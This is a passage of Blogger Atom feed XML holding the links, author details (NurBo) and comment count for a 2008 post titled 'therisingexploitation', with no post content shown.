href='http://www.blogger.com/feeds/5503068606766876320/posts/default/6806097670242286586'/><link rel='alternate' type='text/html' href='http://therisingexploitation.blogspot.com/2008/10/therisingexploitation.html' title='therisingexploitation'/><author><name>NurBo</name><uri>http://www.blogger.com/profile/15773861949363901006</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
